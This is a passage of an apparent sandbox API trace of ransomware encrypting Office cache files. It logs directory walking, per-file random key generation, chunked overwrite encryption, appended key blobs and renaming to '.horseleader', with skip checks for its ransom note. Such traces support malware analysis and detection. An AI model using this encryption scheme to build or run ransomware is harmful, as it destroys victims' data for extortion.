(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.578] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0125.578] lstrcmpiW (lpString1="All Users", lpString2="Windows") returned -1 [0125.578] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0125.578] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0125.578] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0125.579] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.579] GetProcessHeap () returned 0x780000 [0125.579] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.579] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\*") returned 27 [0125.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", 
cAlternateFileName="")) returned 0x7c6720 [0126.795] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0126.796] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\.") returned 27 [0126.796] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0126.796] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0126.796] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0126.796] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0126.796] lstrlenW (lpString=".testttjffg") returned 11 [0126.797] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\.", lpSrch=".testttjffg") returned 0x0 [0126.797] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0126.797] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0126.797] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\." 
(normalized: "c:\\msocache\\all users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.798] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0127.326] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0127.330] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\..") returned 28 [0127.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0127.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0127.330] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0127.330] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0127.330] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0127.330] lstrlenW (lpString=".testttjffg") returned 11 [0127.330] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\..", lpSrch=".testttjffg") returned 0x0 [0127.330] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0127.331] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0127.331] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\.." 
(normalized: "c:\\msocache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.331] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0127.331] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0127.331] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned 66 [0127.332] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0127.332] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0127.332] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0127.332] GetProcessHeap () returned 0x780000 [0127.332] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0127.332] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*") returned 68 [0127.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, 
ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0127.333] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0127.334] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.") returned 68 [0127.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0127.334] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0127.334] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0127.334] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0127.334] lstrlenW (lpString=".testttjffg") returned 11 [0127.334] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0127.334] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0127.335] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0127.335] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.335] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0127.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0127.335] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..") returned 69 [0127.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0127.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0127.336] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0127.336] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0127.336] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0127.336] lstrlenW (lpString=".testttjffg") returned 11 [0127.336] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0127.336] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0127.336] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0127.337] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.337] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0127.337] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Windows") returned -1 [0127.337] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0127.337] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".horseleader") returned 0x0 [0127.337] lstrcmpW (lpString1="ExcelLR.cab", lpString2="#Decrypt#.txt") returned 1 [0127.337] lstrcmpW (lpString1="ExcelLR.cab", lpString2="_uninstalling_.png") returned 1 [0127.338] lstrlenW (lpString=".testttjffg") returned 11 [0127.338] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".testttjffg") returned 0x0 [0127.338] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0127.338] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0127.338] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: 
"c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0127.343] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0127.343] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".txt") returned 0x0 [0127.343] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=16972987) returned 1 [0127.343] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.343] ReadFile (in: hFile=0x174, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.068] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.068] WriteFile (in: hFile=0x174, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.069] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x81565d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.069] ReadFile (in: hFile=0x174, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.528] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.528] WriteFile (in: hFile=0x174, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.528] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x102acbb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.529] ReadFile (in: hFile=0x174, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.564] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.564] WriteFile (in: hFile=0x174, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.565] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.565] WriteFile (in: hFile=0x174, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0128.565] WriteFile (in: hFile=0x174, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0128.565] CloseHandle (hObject=0x174) returned 1 [0133.197] GetProcessHeap () returned 0x780000 [0133.197] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.197] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.horseleader") returned 90 [0133.198] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.horseleader")) returned 1 [0133.211] GetProcessHeap () returned 0x780000 [0133.211] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.211] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0133.211] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Windows") returned -1 [0133.212] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0133.212] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".horseleader") returned 0x0 [0133.212] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0133.212] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="_uninstalling_.png") returned 1 [0133.212] lstrlenW (lpString=".testttjffg") returned 11 [0133.212] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpSrch=".testttjffg") returned 0x0 [0133.212] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0133.213] 
CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0133.213] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0133.213] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0133.214] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".txt") returned 0x0 [0133.214] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2506240) returned 1 [0133.214] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.214] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.219] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.219] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.220] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12f700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.220] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.224] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.224] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.225] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25ee00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.225] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.227] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.228] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.228] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.228] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0133.228] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0133.229] CloseHandle (hObject=0x21c) returned 1 [0133.562] GetProcessHeap () returned 0x780000 [0133.562] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.562] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.horseleader") returned 91 [0133.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.horseleader")) returned 1 [0133.563] GetProcessHeap () returned 0x780000 [0133.563] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.563] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0133.564] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Windows") returned -1 [0133.564] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0133.564] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".horseleader") returned 0x0 [0133.564] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0133.564] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="_uninstalling_.png") returned 1 [0133.564] lstrlenW (lpString=".testttjffg") 
